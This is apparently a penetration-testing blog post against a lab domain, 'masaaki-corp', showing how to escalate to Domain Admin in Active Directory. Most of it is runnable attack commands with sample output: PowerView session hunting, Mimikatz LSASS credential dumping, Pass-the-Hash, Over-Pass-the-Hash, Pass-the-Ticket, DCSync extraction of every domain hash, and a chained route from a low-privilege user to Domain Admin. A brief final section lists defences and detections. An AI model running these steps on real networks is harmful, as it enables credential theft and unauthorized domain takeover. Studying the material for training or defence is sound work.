1. Session Hunting — Finding Where Domain Admins Are Logged In
The most direct path to Domain Admin is finding a machine where a DA is currently logged in, then dumping their credentials from memory. PowerView's Find-DomainUserLocation (formerly Invoke-UserHunter) queries every domain computer's active sessions and compares them against privileged group membership.
-Stealth mode or target specific high-value machines instead of scanning everything.
# Find machines where Domain Admins are currently logged in
PS C:\AD\Tools> Find-DomainUserLocation -Verbose
# Stealth mode — only queries DCs, file servers and machines with many connections
PS C:\AD\Tools> Find-DomainUserLocation -Stealth
# Target a specific group (e.g. find where Enterprise Admins are)
PS C:\AD\Tools> Find-DomainUserLocation -GroupName "Enterprise Admins"
# Check sessions on a specific machine you already have access to
PS C:\AD\Tools> Get-NetLoggedon -ComputerName masaaki-adminsrv
PS C:\AD\Tools> Get-NetSession -ComputerName masaaki-dc
# Example output — masaaki_admin is logged in on masaaki-adminsrv:
UserName : masaaki_admin
ComputerName: masaaki-adminsrv.masaaki-corp.local
IPAddress : 192.168.1.50
Once you've identified the target machine, connect to it (you need local admin on it), then dump credentials from LSASS memory.
2. Credential Dumping with Mimikatz
Mimikatz extracts credentials from Windows memory (LSASS process). It can retrieve plaintext passwords (if WDigest is enabled), NTLM hashes, Kerberos tickets, and cached credentials — all from the LSASS process which holds authentication data for every currently logged-in user.
# Connect to the target machine where masaaki_admin is logged in
PS C:\AD\Tools> Enter-PSSession -ComputerName masaaki-adminsrv
# Run Mimikatz — dump all sekurlsa credentials
PS [masaaki-adminsrv]: C:\AD\Tools> .\Mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
# privilege::debug gives Mimikatz the SeDebugPrivilege needed to read LSASS
# sekurlsa::logonpasswords dumps all cached credentials
# Example output:
Authentication Id : 0 ; 123456
Session : Interactive from 2
UserName : masaaki_admin
Domain : MASAAKI-CORP
NTLM : aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
Key credential types Mimikatz can extract:
Used for Pass-the-Hash. Format: LM:NT. The NT hash is what you need. Can be cracked offline or used directly for authentication.
Extracted from LSASS memory. Can be injected into your session for Pass-the-Ticket attacks without needing the password or hash.
Available if WDigest authentication is enabled (default on older systems). Windows 10/2012R2+ disable this by default but it can be re-enabled via registry.
MSCASHv2 hashes of the last 10 domain logins stored locally. Crack with hashcat (-m 2100). Used on disconnected machines.
The PowerShell version of Mimikatz runs entirely in memory — no binary touches disk on the remote machine. This is the preferred method during engagements.
# Load Invoke-Mimikatz
PS C:\AD\Tools> . .\Invoke-Mimikatz.ps1
# Dump credentials on the local machine
PS C:\AD\Tools> Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
# Dump credentials on a remote machine (requires local admin on target)
PS C:\AD\Tools> Invoke-Mimikatz -DumpCreds -ComputerName masaaki-adminsrv
# Dump credentials on multiple machines at once
PS C:\AD\Tools> Invoke-Mimikatz -DumpCreds -ComputerName @('masaaki-adminsrv','masaaki-dev01')
3. Pass-the-Hash (PTH)
Windows NTLM authentication does not require you to know the plaintext password — only the NTLM hash. Pass-the-Hash injects the hash directly into a new authentication session, impersonating the account without ever cracking the password. This works for local accounts and domain accounts.
# Use Mimikatz sekurlsa::pth to inject the hash and spawn a process as the target user
PS C:\AD\Tools> .\Mimikatz.exe "sekurlsa::pth /user:masaaki_admin /domain:masaaki-corp.local /ntlm:32ed87bdb5fdc5e9cba88547376818d4 /run:powershell.exe" exit
# A new PowerShell window opens running as masaaki_admin
# The NTLM hash was injected — no password needed
# Verify in the new window
PS C:\AD\Tools> whoami
masaaki-corp\masaaki_admin
# Now use the session to access resources as DA
PS C:\AD\Tools> Enter-PSSession -ComputerName masaaki-dc
4. Over-Pass-the-Hash (OPtH) — Getting a Kerberos TGT from an NTLM Hash
Over-Pass-the-Hash (also called Pass-the-Key) uses the NTLM hash to request a proper Kerberos TGT from the DC. The result: a full Kerberos session that works everywhere NTLM is blocked or degraded. This is the preferred technique in modern AD environments that enforce Kerberos.
# Use sekurlsa::pth with /run:cmd.exe — same syntax, but Kerberos TGT is auto-requested
PS C:\AD\Tools> .\Mimikatz.exe "sekurlsa::pth /user:masaaki_admin /domain:masaaki-corp.local /ntlm:32ed87bdb5fdc5e9cba88547376818d4 /run:cmd.exe" exit
# In the new CMD window — trigger Kerberos authentication (any network access works)
C:\> dir \\masaaki-dc\C$
# This causes Windows to request a TGT for masaaki_admin from the DC using the hash
# Check the ticket was issued:
C:\> klist
Cached Tickets: (2)
#0 Client: masaaki_admin @ MASAAKI-CORP.LOCAL
Server: krbtgt/MASAAKI-CORP.LOCAL @ MASAAKI-CORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
# Now use Kerberos-authenticated PS Remoting
PS C:\AD\Tools> Enter-PSSession -ComputerName masaaki-dc.masaaki-corp.local
5. Pass-the-Ticket (PTT)
Pass-the-Ticket extracts a Kerberos ticket (TGT or TGS) from one machine and injects it into a session on another, impersonating the ticket's owner. This is useful when you have a TGT for a privileged account but no hash or password.
# Export all Kerberos tickets from the current session
PS C:\AD\Tools> .\Mimikatz.exe "sekurlsa::tickets /export" exit
# This creates .kirbi files for every ticket in memory
# Identify the DA ticket:
[0;3e4][email protected]
# Inject the ticket into your current session
PS C:\AD\Tools> .\Mimikatz.exe "kerberos::ptt [0;3e4][email protected]" exit
# Verify the ticket is loaded
PS C:\AD\Tools> klist
# Access DC resources with the injected ticket
PS C:\AD\Tools> dir \\masaaki-dc\C$
PS C:\AD\Tools> Enter-PSSession -ComputerName masaaki-dc
6. DCSync — Replicating All Hashes from the DC
DCSync is the most powerful credential attack in Active Directory. Instead of running Mimikatz on the DC itself (which requires physical access or SYSTEM on the DC), DCSync uses legitimate AD replication protocols to ask the DC to send you password hashes — exactly as a second DC would during synchronisation.
To run DCSync you need one of: Domain Admin rights, Enterprise Admin rights, or the two replication permissions on the domain object (DS-Replication-Get-Changes + DS-Replication-Get-Changes-All). See Blog 1 for how to grant yourself these via ACL abuse.
# Extract the krbtgt hash — the key to Golden Ticket attacks
PS C:\AD\Tools> .\Mimikatz.exe "lsadump::dcsync /user:masaaki-corp\krbtgt" exit
# Example output:
Object RDN : krbtgt
SAM Username : krbtgt
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502
Credentials:
Hash NTLM: 4e9a25a62b7b4c8c2b6e11f3a9d0e9a2
ntlm- 0: 4e9a25a62b7b4c8c2b6e11f3a9d0e9a2
# DCSync the Domain Administrator account
PS C:\AD\Tools> .\Mimikatz.exe "lsadump::dcsync /user:masaaki-corp\Administrator" exit
# Dump ALL hashes from the domain (equivalent to NTDS.dit extraction)
PS C:\AD\Tools> .\Mimikatz.exe "lsadump::dcsync /domain:masaaki-corp.local /all /csv" exit
# Save to file for offline cracking
PS C:\AD\Tools> .\Mimikatz.exe "lsadump::dcsync /domain:masaaki-corp.local /all /csv" exit | Out-File hashes.txt
7. Derivative Local Admin — Chaining Access to Domain Admin
Derivative local admin is the technique of chaining local admin access across machines until you reach one with a DA session. You are not exploiting anything — you are legitimately using admin rights you have, hopping machine to machine until credentials from a privileged account land in your hands.
low-priv domain user → local admin on masaaki-dev01 (via group membership) → Mimikatz → masaaki_svc hash → PTH → local admin on masaaki-adminsrv → Mimikatz → masaaki_admin (DA) TGT → Domain Admin
# Step 1: You already have local admin on masaaki-dev01 (found with Find-PSRemotingLocalAdminAccess)
# Dump creds from masaaki-dev01
PS C:\AD\Tools> Invoke-Mimikatz -DumpCreds -ComputerName masaaki-dev01
# Found: masaaki_svc NTLM hash: 7a6c2f1b9d4e8f3c5a2b1e9d4f6a3c8b
# Step 2: PTH as masaaki_svc
PS C:\AD\Tools> .\Mimikatz.exe "sekurlsa::pth /user:masaaki_svc /domain:masaaki-corp.local /ntlm:7a6c2f1b9d4e8f3c5a2b1e9d4f6a3c8b /run:powershell.exe" exit
# Step 3: masaaki_svc has local admin on masaaki-adminsrv — dump creds there
PS C:\AD\Tools> Invoke-Mimikatz -DumpCreds -ComputerName masaaki-adminsrv
# Found: masaaki_admin TGT in memory (Domain Admin is logged in here)
# Step 4: Export and inject the TGT
PS C:\AD\Tools> .\Mimikatz.exe "sekurlsa::tickets /export" exit
PS C:\AD\Tools> .\Mimikatz.exe "kerberos::ptt [email protected]" exit
# Step 5: Domain Admin access
PS C:\AD\Tools> Enter-PSSession -ComputerName masaaki-dc
8. Prevention & Detection
Accounts in this group cannot use NTLM, DES or RC4 Kerberos encryption, and their credentials are not cached in LSASS. Add all privileged accounts. Breaks PTH and most Mimikatz extractions for those accounts.
Isolates LSASS in a Hyper-V protected container. Mimikatz cannot read from LSASS even with SYSTEM access. Requires UEFI and Secure Boot.
Alert on event 4662 where Object Type is domainDNS and Properties include the two replication GUIDs. Any account that is not a DC performing replication is anomalous.
DAs should NEVER log into Tier 1 or Tier 2 machines. If a DA never logs into workstations, their credentials can never be stolen from workstation LSASS memory.
Ensure HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential is set to 0 across all machines via GPO. This blocks plaintext password extraction via Mimikatz.
Enable LSASS as a Protected Process Light via HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL = 1. Mimikatz requires a kernel driver to bypass this — significantly raising the cost of the attack.